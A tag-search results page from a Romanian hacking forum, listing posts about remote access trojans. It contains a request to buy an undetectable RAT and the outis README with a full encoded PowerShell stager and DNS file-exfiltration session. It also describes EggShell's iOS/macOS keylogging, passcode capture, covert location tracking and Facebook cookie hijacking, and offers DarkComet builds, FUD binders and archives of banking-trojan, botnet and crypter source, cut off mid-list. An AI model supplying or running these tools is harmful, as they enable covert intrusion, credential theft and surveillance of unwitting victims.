Jump to content

Search the Community

Showing results for tags 'rat'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 12 results

  1. Salut am nevoie de cineva cu un RAT bun, sa fie ușor de folosit și nedetectabil. Sunt dispus să-l cumpăr sau sa plătesc pt un job interesant. Dacă este cineva care controlează forate bine chestia asta și ai plac provocările scrie-mi te rog.
  2. outis outis is a custom Remote Administration Tool (RAT) or something like that. Think Meterpreter or Empire-Agent. However, the focus of this tool is neither an exploit toolkit (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms. On the Name The cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is "Outis" meaning "Nobody" in ancient Greek. Thus, when Polyphemus later shouted, that Nobody was about to kill him, strangly no help arrived. My thanks to Marcel for remembering this marvelous piece of classic tale. Dependencies for the Handler Archlinux users can install the following packages: python3 # includes cmd, tempfile, ... python-progressbar2 python-dnspython python-crypto python-pyopenssl and maybe more... In other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter. Also, older versions might cause problems: pyopenssl needs to be version 16.1.0 or newer, check as follows: $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)' You can set up a python virtual environment quite easily: $ virtualenv outis-venv $ source ./outis-venv/bin/activate (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl This results to the following package list, which seems to work for me: $ pip freeze appdirs==1.4.3 asn1crypto==0.22.0 cffi==1.10.0 cryptography==1.8.1 dnspython==1.15.0 idna==2.5 packaging==16.8 progressbar2==3.18.1 pycparser==2.17 pycrypto==2.6.1 pyOpenSSL==16.2.0 pyparsing==2.2.0 python-utils==2.1.0 six==1.10.0 Installation Clone this git with recursive flag to also clone its submodules in the thirdpartytools folder git clone --recursive ... The handler runs on Python 3. Install its dependencies and run it. It will generate stagers, agents and everything else for you. To bind low ports without needing root privileges, consider using a capability wrapper. Terms agent: software, that runs on the victim system handler: software, that parses your commands and leads the agents (usually it runs on your server) stager: short script that downloads the agent (using the transport module) and runs it transport: communication channel between stager/agent and handler, e.g. ReverseTCP platform: victim architecture to use for stager/agent scripts, e.g. PowerShell Currently Supported Plattforms PowerShell (partial) Currently Supported Transports Reverse TCP DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection) Currently Supported Cryptography Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR Agent stages can be authenticated using RSA signatures and pinned certificates Transport connections can be encrypted / authenticated using TLS and pinned certificates Currently Supported Commands and Controls ping requests to test the connection (partial) text message format (partial) upload and download of files Currently Supported Extras When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS). Usage Examples Download of a file using staged DNS transport with POWERSHELL platform could look like this: $ outis outis> set TRANSPORT DNS outis> set ZONE zfs.sy.gs outis> set AGENTDEBUG TRUE outis> info [+] Options for the Handler: Name Value Required Description ----------------- ---------- -------- ----------------------------------------------------------------- TRANSPORT DNS True Communication way between agent and handler (Options: REVERSETCP, DNS) CHANNELENCRYPTION TLS True Encryption Protocol in the transport (Options: NONE, TLS) PLATFORM POWERSHELL True Platform of agent code (Options: POWERSHELL) PROGRESSBAR TRUE True Display a progressbar for uploading / downloading? (only if not debugging the relevant module) (Options: TRUE, FALSE) [+] Options for the TRANSPORT module DNS: Name Value Required Description --------- ----------- -------- ------------------------------------------------------------------------ ZONE zfs.sy.gs True DNS Zone for handling requests LHOST 0.0.0.0 True Interface IP to listen on LPORT 53 True UDP-Port to listen on for DNS server DNSTYPE TXT True DNS type to use for the connection (stager only, the agent will enumerate all supported types on its own) (Options: TXT, A) DNSSERVER False IP address of DNS server to connect for all queries [+] Options for the PLATFORM module POWERSHELL: Name Value Required Description -------------------- -------------------------- -------- ---------------------------------------------- STAGED TRUE True Is the communication setup staged or not? (Options: TRUE, FALSE) STAGEENCODING TRUE True Should we send the staged agent in an encoded form (obscurity, not for security!) (Options: TRUE, FALSE) STAGEAUTHENTICATION TRUE True Should the stager verify the agent code before executing (RSA signature verification with certificate pinning) (Options: TRUE, FALSE) STAGECERTIFICATEFILE $TOOLPATH/data/outis.pem False File path of a PEM with both RSA key and certificate to sign and verify staged agent with (you can generate a selfsigned cert by using the script gencert.sh initially) AGENTTYPE DEFAULT True Defines which agent should be used (the default outis agent for this plattform, or some third party software we support) (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER) TIMEOUT 9 True Number of seconds to wait for each request (currently only supported by DNS stagers) RETRIES 2 True Retry each request for this number of times (currently only supported by DNS stagers) AGENTDEBUG TRUE True Should the agent print and log debug messages (Options: TRUE, FALSE) outis> generatestager [+] Use the following stager code: powershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7 ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG 8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6 ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE 8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5 AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF AE4AVAAiADsASQBFAFgAIAAkAHMAOwA= outis> run [+] DNS listening on 0.0.0.0:53 [+] Sending staged agent (34332 bytes)... 100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16 [+] Staging done [+] Waiting for connection and TLS handshake... [+] Initial connection with new agent started [+] Upgrade to TLS done outis session> [+] AGENT: Hello from Agent outis session> download C:\testfile.txt /tmp/out.txt [+] initiating download of remote file C:\testfile.txt to local file /tmp/out.txt [+] agent reports a size of 3295 bytes for channel 1 100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00 [+] wrote 3295 bytes to file /tmp/out.txt outis session> exit Do you really want to exit the session and close the connection [y/N]? y outis> exit Or maybe we want to use dnscat2 for the real deal and just use outis to stage it: $ outis outis> set TRANSPORT DNS outis> set AGENTTYPE DNSCAT2 outis> set ZONE zfs.sy.gs outis> run [+] DNS listening on 0.0.0.0:53 [+] Sending staged agent (406569 bytes)... 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17 [+] Staging done [+] Starting dnscat2 to handle the real connection New window created: 0 New window created: crypto-debug Welcome to dnscat2! Some documentation may be out of date. auto_attach => false history_size (for new windows) => 1000 Security policy changed: All connections must be encrypted and authenticated New window created: dns1 Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = zfs.sy.gs]... Assuming you have an authoritative DNS server, you can run the client anywhere with the following (--secret is optional): ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs To talk directly to the server without a domain name, run: ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== Of course, you have to figure out <server> yourself! Clients will connect directly on UDP port 53. dnscat2> New window created: 1 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) dnscat2> sessions 0 :: main [active] crypto-debug :: Debug window for crypto stuff [*] dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*] 1 :: command (feynman-win7) [encrypted and verified] [*] dnscat2> session -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'. command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt Attempting to download c:/testfile.txt to /tmp/out.txt Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt! command (feynman-win7) 1> exit Input thread is over Inspirations This project was inspired by (and shamelessly stole part of its code from): Empire: - https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py — generate_launcher uses a HTTP(S) stager - https://github.com/adaptivethreat/Empire/tree/master/data/agent — stager (step two after initial launcher) and agent (step three) - https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py — powershell script generation and stipping Metasploit: - https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb — CmdStager for bourne, ... ReflectiveDLLInjection: - https://github.com/stephenfewer/ReflectiveDLLInjection p0wnedShell: - https://github.com/Cn33liz/p0wnedShell — some ideas for AMSI evation for future use dnscat2: - https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md — ideas on protocol design over DNS - https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 — powershell version of the dnscat2 agent dnsftp - https://github.com/breenmachine/dnsftp — short script parts for stagers via DNS Disclaimer Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only. Download outis-master.zip or git clone https://github.com/SySS-Research/outis.git Source: https://github.com/SySS-Research/outis
  3. Brief Overview EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploits “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more commands for macOS And Jailbroken iOS Devices. This tool creates a bash payload what spawns a command line session with the target including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES Encrypted Communication All data sent between the server and target are encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started. Getting Started To use EggShell, you must have pycrypto and Python 2.7.x installed Install using git: (macOS/Linux) git clone https://github.com/neoneggplant/EggShell cd EggShell python eggshell.py Create And Run A Payload Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary. Example: running the created payload on our target Back on our server, we can see we received a connection and an eggshell session has been started! macOS Commands ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file picture : take picture through iSight camera getpid : get process id openurl : open url through the default browser idletime : get the amount of time since the keyboard/cursor were touched getpaste : get pasteboard contents mic : record microphone brightness : adjust screen brightness exec : execute command persistence : attempts to connect back every 60 seconds rmpersistence : removes persistence iOS Commands sysinfo : get system information ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file frontcam : take picture through front camera backcam : take picture through back camera mic : record microphone getpid : get process id vibrate : make device vibrate alert : make alert show up on device say : make device speak locate : get device location respring : respring device setvol : set mediaplayer volume getvol : view mediaplayer volume isplaying : view mediaplayer info openurl : open url on device dial : dial number on device battery : get battery level listapps : list bundle identifiers open : open app persistence : installs LaunchDaemon – tries to connect every 30 seconds rmpersistence : uninstalls LaunchDaemon installpro : installs eggshellpro to device EggShellPro Commands (Cydia Substrate Extension) lock : simulate lock button press wake : wake device from sleeping state home : simulate home button press doublehome : simulate home button double press play : plays music pause : pause music next : next track prev : previous track getpasscode : log successfull passcode attempts unlock : unlock with passcode keylog : log keystrokes keylogclear : clear keylog data locationservice: turn on or off location services EggShell Pro EggShell Pro is a Cydia substrate library that takes advantage of the the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has used to be unlocked with. When interacting with an iOS Device, simply run “installpro” and the dylib file will upload to the device followed by a respring. Navigating/Downloading Files EggShell has a command line interface like feel to it. Using the unix like commands built into eggshell, we can print working directory (pwd), directory listing (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine. Taking Pictures Taking a photo with the “picture” command on macOS will active the iSight camera and send the image data back to the server. To take a picture on iOS use the “frontcam” or “backcam” iOS Location Tracking Even With Location Services Off EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off. We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps. iOS Getting Passcode EggshellPro hooks into lock screen functions and logs any success the devices passcode in memory. When we run “getpasscode” we are sent back the passcode that was used last to unlock the device. macOS Hijacking Safari Facebook Sessions With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use it to login on another browser. macOS Persistence To achieve persistence, even without being root, the command “persistence” adds the payload to the crontab file. It attempts to re-connect every 60 seconds even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from crontab. Recording Audio Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”, this will stop the recording of audio and download the audio data. Handling Multiple Sessions With the built in feature “MultiServer”, we can listen for multiple connections. Below is an example with 2 connections on the same device, however this can be done with multiple devices. As we connect to targets, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” session numbers, and “back” to go back to the multiserver console Payloads In Apps Payloads can easily be added inside of apps. Below is an example of using the “system()” function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS Immediately after running the app, our payload is run and just as expected, we have a connection Safari Exploit + EggShell Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro Original Video Thanks For Viewing lucasjackson5815@gmail.com Download: EggShell-master.zip Source: http://lucasjackson.me/index.php/eggshell/
  4. So I decided to share with you guys this little "collection" of the DarkComet RAT I had. Its from versions 4.0 to 5.3.1 - To be honest, for me those were the best versions of DarkComet. Extra items added: Celesty Binder: Pictures of Celesty Binder: Extension Spoofer: IF OR WHEN YOU DO DECIDE TO MAKE A VIRUS SCAN. PLEASE NOTE THAT DARKCOMET BUILDS VIRUSES, A POWERFUL ONE. DO NOT COME TO ME OR TO THIS THREAD TO POST SUCH THINGS AS, "It's infected! don't download. I scanned it on Virustotal and it was detected as malware!". OF COURSE IT WAS, BECAUSE IT BUILDS THEM. [*] Those are known as "false-positive" just to let you know. Unless if whatever other malicious buidling program you download(ed) really is backdoored. [*] And for your safety, I will provide you all with a very, and I mean VERY helpful tool(s). This site is trusted, and it has tools that will probably safe your computer from skids that are learning how to use RATs, you don't need to buy these tools, they are completely free.. It also has other cool stuff like some legal keyloggers if you wanna check them out. Download for the DarkComet RAT 4.0 - 5.3.1 Full Versions: http://tinyurl.com/l9u8xxz +And as always, be careful with downloads out there, hopefuly you knowing what they are capable of doing from this RAT you'll be more safe. And also remember that the DarkComet remover is only for DarkComet RATs only!, not for any other RATs.. This also has no match against a crypted STUB. password to the file: powersafe Source: HackForums
  5. This is tool that allow you to control your computer form anywhere in world with full support to unicode language. Latest Features: 1. The re-application from scratch programming 2. a simple amendment to the Alsuchit to make it lighter than the previous 3. correct some of the mistakes and correct When you copy the value in the Registry 4. Amendment in the filming of the screen faster than the previous version 5. pull password stronger than the previous addition is brought any update when you save your password 6. feature [Transfer] in, file manager to see transport and lifting full control case 7. new additions in Builder 8. became less the size of the server [83 KB] 9. many changes in this version rghost.net/7QQZs742M Have fun.
  6. 50% DISCOUNT FOR THE FIRST 10 BUYERS youtube] SCAN RESULT Features * GUI and inbuilt stub are coded in C++ * No depentancies * Assembly change * FUD Attention!!!!! IF you bind infected files your binded file it will be infected too ! so be careful :blackhat: Contact me Skype: snippy.boy
  7. This project is intended for malware developers,researchers or other security experts. This is the final release of this project which contains: Android Source -Dendroid Size: 5.47 MB Download: [url=http://speedy.sh/brmnE/Android-Source.zip]Android Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e06a9a222a623dea995877129f1124541f571ca3 ====================== Banking-Trojans-Source bootkit hunter or zusy bot iBanking JHTTP source PowerLoader Spy eye v1.0 tinibanker Zemra ZeuS 2.0.8.9 Size: 42.36 MB Download: [url=http://speedy.sh/NScsB/Banking-Trojans-Source.zip]Banking-Trojans-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 56a56a9bea910a56d5398a43faae110f51f7999c ====================== Binders-Source Azazel Binder BBinder Stubgen Binder Joiner Biohazard Binder BlindSpotv1.0 (Binder) C++ Files Merger Danger Zone Binder Devil Binder 1.0 [SRC](VB6) Ejemplo Binder JABT1.2 - Justin Another Binder Tool Little Joiner NRG Binder Picture Binder Viotto Binder XP0wer CrypterBinder Size: 6.87 MB Download: [url=http://speedy.sh/fJ58N/Binders-Source.zip]Binders-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 8bac687326d3cdde2bc45ad3ac7b7fc693dc0355 ====================== Botnet-Source Acebot Agobot blacksun DarkIRC Evilbot Forbot gtbot Litmus sdbot Spybot urxbot v0lk Botnet (rbot)x0n3 Satan v1.0 Priv8 By CorryL{x0n3 h4ck} 120 Moded By t0nixx 120 [BruteTest] V0.5 120 [DVNC TEST] DDOS V1.0 120 [ModBot] SNIFF VNCBRUTE SP2FIX NICK 120 [ModBot] SP2FIX SYM VNCBRUTE 120 [ModBot] V0.5 120 [ModBot] V1.0 120 [ModBot] VNCBRUTE MSSQL 2007 120 [netapi sym mohaa] (vncbrute sp2patch) 120 [SP2 PATCH BRUTE] V2.0 120 [SP2 PATCH] V2.0 120 [SP2FIX VNCBrute Mohaa] STRIP V1.0 120 [SP2FIX VNCBrute Mohaa] Test V1.0 120 [SP2fix VncBrute] FINALV1.0 120 MYSQL V2 120 MYSQL V999 120 MYSQL1THREAD V2 120 MYSQLBRUTE V2 120 PSTORE MSSQL SYM NTPASS VNC NETAPI 2007 120 VnC Brute+pStore @@ SKUZ FIXED DDOS @@ dkcs ddos bot Radmin scanner EcKstasy sHk Bot.svchost ns dev.NOT FOR RELEASE a a59base acidBot acidBot2fix acidbotEncypt Ad Clicker Bot Private Free Hack VIP Tool agobot3 0.2.1 pre4 priv AkBot IRC lsd mod AkBot x0r dns Akbot v0.4.1 netapi asn pstore spam aspergillus 1.3 bBot Version 0.6 BioZombie 1.5 Beta blacksun BlowSXT blueeyebot bmw bot mods botnet200 Brainbot v1.5 C 15Pub pre4.c C 15Pub CBot Fixed Version ChodeBot C++ v1 base ciscobawt Crackbot v1.4b final spin Crx realmbot.VNC+RFI Crx realmbot VNC exploit CYBERBOTv2.2 Stable.m0dd ownz.DreamWoRK CYBERBOTv4.0 DarkAnalNKX BACKDOOR REMOVED darkbot6a3 Darkness IRC Bot Darkness.last.mod dbot irc sell Dbot.v3.1 DCI Bot dci bot dopebot0.22 dopebot0.22.uncrippled dopebot dopebot 2.0 dopebot current drx realcast woopie EPiC BoT V1 fiesta Sploit pack ForBot sniffer other mods ch405 ForBot Olin SYM VNC NETAPI All The Public Shit frozenbot6 fukj00 fungus fxBot beta g spotv2.0 Gellbot 3 GENTOOreptile base GigaBot DCASS gsys1 gsys3 final gt badteam gt virtualslut gt gtbot hackersteam gtsev spreader gtsev spreader 2 H Bot M0d 3.0 M0dd3d by TH & Sculay H Bot M0d 3.0 M0dd3d by TH Sculay h3xb0t h4x0rb0t 2.0 gt edition happybot.v2.0b harvecter bot hdbotv0.2 ciscoscan hellbot3[10 06 05] hellbot10 06 05 hellbotv3 htmlinfectbot hydra 2008.1 I1.4b0 icebot icepack ie7 mod IHS H A V003 Exploits iis gt bot illusion bot Imbot1.3 V3.1 IMBOT MOD IMBot SRC $$ IMbotMod V4.1 InTeL m0dd Test101 ms0640 irbot0.15 ircd.tar.gz IrcWormv1.3 SourceCode IrINi bot 0.1 public limited version for win32 italian jbot JRBOT Modded By bloody kaiten.c knight KoBRA RFISCaN.EDiTEDBYBRaT l0lw0rm LiquidBot FixEd By Pr1muZ anD Ic3 litmus2 bot litmus2 bot 2 Lnknell LoexBot M0LdBotv1.0 small microbot mm0d asn mmodbasn ModBot V1 Mod by iNs v0.2 MSDN(mirc scan bot) MSITBotWin MSN Spread Bot Priv8 my poly sploit ie6 ie7 op firefox mystic Urx mystic Urx Fixed by Pr1muz nbot032 update 5 28 08 enc 07 10am Nbot NESBOT v5 nesebot1.1r ASN PNP nesebot1.2 Netapi.Prueb Norman.2oo6.Prif Jessi Off New Folder New NZM netapi bot niggerbot vnc nocrypt NinjaBot NITE AIM NtScan rbot nullbot[2.1.1] [23 11 05] nullbot[finals] NzM 3.0 By Ph3mt nzm netapi nzm priv shit nzmlite sql nzmlite symantec oscar panicAttack pBot pBot v2 Phatbot gh3tt0Bot Phatbot NortonBot phatbot SkYKr3w Phatbot stoney phatbot[11 20 04][PCAP][SYNSCAN] phatbot alpha1 phb2 php bot plague.gecko.netapi pr1vsrc nzm m0d by ibby private enzyme rxmod 04 04 05 prueva[1].Netapi.asn.m0dded Norman prv nzm rx.sp2fix.rcast PsyProxy pwnBoT Q8Bot q8bot r00fuzV1.1a r00t3d.asn.ftp.lsass.by.Morgan RAGEBOT RAGEBOT[Clean] RansomWar Ravbot rbot0.2 scionix 102b working rBot0.3.3Pub rbot LC Priv8 rBot sxt harro rBot 0.2 MODE by akusot.v1.5 rbot dnsquery2007 rbot netapi vnc ipswitch rBoT oTh3R dImeNsIoN 4.4x(2) rBoT oTh3R dImeNsIoN 4.4x rBotv0.6.6 privlsass Release no cpp reptile small reptile.04.pnp.asn.ftpd.reload Reptile. small .DMG.Fixes.0x1FE reptile reverb reverse rezo.ninjabot RFI SCAN.V2.PRIVATE 1x33x7 ri0t[v5] ri0t] ri0t v4 ri0t v5 ri0tv5 RNM5 Priv Pr1muZ rnm5b Rose v1.3 2007 by DreamWoRK Rose1.1 Rose 2008 Rose v1.3 2007 by DreamWoRK rouge bots xdcc Ruffbot1.2 MassAsnPrivShit 150705 Ruffbotv2 rx 14 09 06 Netapi doyley rx AKMod msDTC1025 Stripp3d sc4nn3rz rx asn 2 re worked v3 rx asn 2 re worked v2 rx asn 2 re worked v3 RX GUTTED rx sky2kpnpprivate RX STRIP BOTKILLER 0.5 rx dev service working lsass sasser ftpd rx dev+service+working lsass+sasser+ftpd rX lsdigital Mod priv Rx Temptation RXB tM d VNC NETAPI ASN 2006 rxBot0.6.6b priv stable CoKeHeAd rxbot EcLiPsE cReW 1.1.priv rxbot EcLiPsE cReW 1.1.priv RxBot MP RXBOT RevengE2005pnp rxBot sxt harro rxbot xerion 2.0 rxbot7.5 rxbot2006 rxbot 0.65 Rxbot 7.6 Modded Tr0gdor Rxbot 7.6 Modded Tr0gdor 2 Rxbot ak 7.7 fira pviv8 rxbot undertow 6 6 05ASN rxbot undertow 6 10 05 rxbot undertow[PnP]modded.memcpy.0.2 rxbot v0.6.5 pk lsdigital spreader rxBot v0.7.7 Sass s5 Sbot RARSpreader SBX.amk.0x00 screens sd with fake xdcc by Synco sd bot all SDbot05b getadm sdbot05b skbot mods by sketch sdbot i3s sdbot ntpass codefix nils 22.10.03 Sdbot Hardcore Mod By StOner SDBot with NB spreader SDX.amk.0x00 shadowbot m3 shadowbot shadowbotv3 shellbotFTP sHk Bot.svchost ns dev.NOT FOR RELEASE SkuZ BoT V.1 2006 SkuZ Netapi VNC IM Sky Bot incomplete Skype Spread(PoC).7z Small SpazBot SpyBot Leechbot r1.5a private spybot1.2 FULl spybot1.4 spybot 1.2c spybot 1.3m spybot 1.4 STEAMBOT src 2008 Stripped RXV8 svBot svbot activex svmail SYM VNC NETAP 304 ASN TANKBOT 1.0 tgspy nt TsGh Bot v3 uber wks asn m0dded Pr1v Unix bot 2.2.5 uNk + USB URX pnp asn Urx.SYM+ASN Urxbot.pRiV sKull.MoD ASN FTP WORKING vbbot vBot VNCscanner VrX 5 Priv8 Msn Yahoo TIM EXPLS DDOS 116kb w32 netapi rfi whit vnc exploit w32ogw0rm WarSkype wbot 0.2 Win32.Anthrax Win32.Divinorum Win32.Fga Win32.FridaySectoriate Win32.Harulf Win32.Mimail Win32.MiniPig Win32.Relock Win32.Whore wisdom wisdom3 wisdom phr0st modd Wiseg3ck0 AIM DDOS woodworm2 X0R USB By Virus xerion2.5 XfireSpread xTBot.0.0.2 priv ya.bot Zemra Source Zeus 1.1.0.0 zunker Zutick Administrator Bot Size: 190.74 MB (200,005,186 bytes) Download: [url=http://speedy.sh/chjZT/Botnet-Source.zip]Botnet-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 849f862af76c327caef0c41037c24858c072abc3 ====================== Crypters-Source Abstract Crypter Carb0n Crypter v1.7 [C++]darkcrypt0r Christmas Crypter CodingNation Crypter Crypter Crypter v1 Cryptic3source-Crypter Cryptosy Cryptosy Crypter Cyber Crypt 7 D0pe Crypter Dark 